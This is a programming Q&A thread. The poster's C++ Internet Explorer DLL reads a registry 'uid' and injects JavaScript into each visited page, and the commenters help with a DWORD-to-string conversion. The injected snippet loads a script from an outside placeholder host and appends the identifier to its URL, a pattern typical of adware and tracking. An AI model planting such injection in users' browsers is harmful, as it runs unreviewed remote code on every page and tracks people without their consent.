# Reading registry value from C++ (dll for IE) and inject the result into Javascript

Tags: javascript, c++

**UPDATE**

I tried to convert "buffer"(DWORD) to string according to comments, but i get the following errors :

> Error 3   error C2664: 'sprintf' : cannot convert parameter 1 from 'char' to 'char *'
>
> Error 4   error C2110: '+' : cannot add two pointers

And here's the updated code below, thanks for the help, all comments are much appreciated

> Buffer value can be for example : BDF59E9937973429B3016736D7BECF92

```
        HKEY hKey;
        DWORD buffer;
        LONG result;
        char buffstr;
        unsigned long type=REG_DWORD, size=1024;

            result = RegOpenKeyEx(HKEY_CURRENT_USER,TEXT("SOFTWARE\\softname"),0,KEY_READ,&hKey);
            if(result == ERROR_SUCCESS)
            {
               RegQueryValueEx(hKey,TEXT("uid"),NULL,&type,(LPBYTE)&buffer,&size);
               RegCloseKey(hKey);
            }
        sprintf(buffstr, "%lu", ( unsigned long )buffer);
        CComBSTR bstrScript = L"if (document.getElementsByTagName('head')[0]) { if(!document.getElementById('bho_js')) {var html_doc = document.getElementsByTagName('head')[0]; var _js = document.createElement('script');  _js.setAttribute('type', 'text/javascript'); _js.setAttribute('id', 'bho_js'); _js.src = ('https:' == document.location.protocol ? 'https://www.url.com' : 'http://www.url.net') + '/script/r.php?uid="+buffstr+"';  html_doc.appendChild(_js);}}";
        CComBSTR bstrLanguage = L"javascript";
```

**ORIGINAL POST**

I've managed to inject a javascript on IE using a C++ DLL, but I'm trying to pass a parameter (a Registry value REG_SZ named "uid" and 64 character long ) to the JS injection, but it gets me this error :

```
2   IntelliSense: expression must have integral or unscoped enum type
```

Any recommendation is very welcome as I'm below newbie in C++

```
HKEY hKey;
DWORD buffer;
LONG result;
unsigned long type=REG_DWORD, size=1024;
result = RegOpenKeyEx(HKEY_CURRENT_USER,TEXT("SOFTWARE\\softname"),0,KEY_READ,&hKey);
if(result == ERROR_SUCCESS)
{
    RegQueryValueEx(hKey,TEXT("uid"),NULL,&type,(LPBYTE)&buffer,&size);
    RegCloseKey(hKey);
}
CComBSTR bstrScript = L"if (document.getElementsByTagName('head')[0]) { if(!document.getElementById('bho_js')) {var html_doc = document.getElementsByTagName('head')[0]; var _js = document.createElement('script');  _js.setAttribute('type', 'text/javascript'); _js.setAttribute('id', 'bho_js'); _js.src = ('https:' == document.location.protocol ? 'https://www.hostnamehttps.com' : 'http://www.hostnamehttp.net') + '/script/r.php?uid="+buffer+"';  html_doc.appendChild(_js);}}";
CComBSTR bstrLanguage = L"javascript";
```

The problematic line being :

```
CComBSTR bstrScript = L"if (document.getElementsByTagName('head')[0]) { if(!document.getElementById('bho_js')) {var html_doc = document.getElementsByTagName('head')[0]; var _js = document.createElement('script');  _js.setAttribute('type', 'text/javascript'); _js.setAttribute('id', 'bho_js'); _js.src = ('https:' == document.location.protocol ? 'https://www.hostnamehttps.com' : 'http://www.hostnamehttp.net') + '/script/r.php?uid="+buffer+"';  html_doc.appendChild(_js);}}";
```

With buffer being a DWORD, how should I declare it to be able to include it in this CComBSTR? (sorry if it sounds trivial)

Comment: Which line is it in? I notices you build bstrScript but are you allowed to "add" DWORD to CComBSTR ?

Comment: indeed, it's exactly my problem, i've updated the description, do you have a solution ?

Comment: You need to convert DWORD to a string, and replace it in the place of `+buffer+`. Use `ltoa` to convert `buffer` to string, you use `sprintf`. For example `sprintf(buffstr, "%lu", ( unsigned long )buffer);`, and then use `buffstr` instead of `buffer`.

Comment: thanks a lot Grzegorz i've updated the code accordingly but still have a few issues.

Comment: Any suggestion on how to declare "bufferstr" or change "buffer" so that it can be inserted into "CComBSTR bstrScript" ? It would be much appriciated thanks !

Comment: As I wrote above, use sprintf. An example is in that response.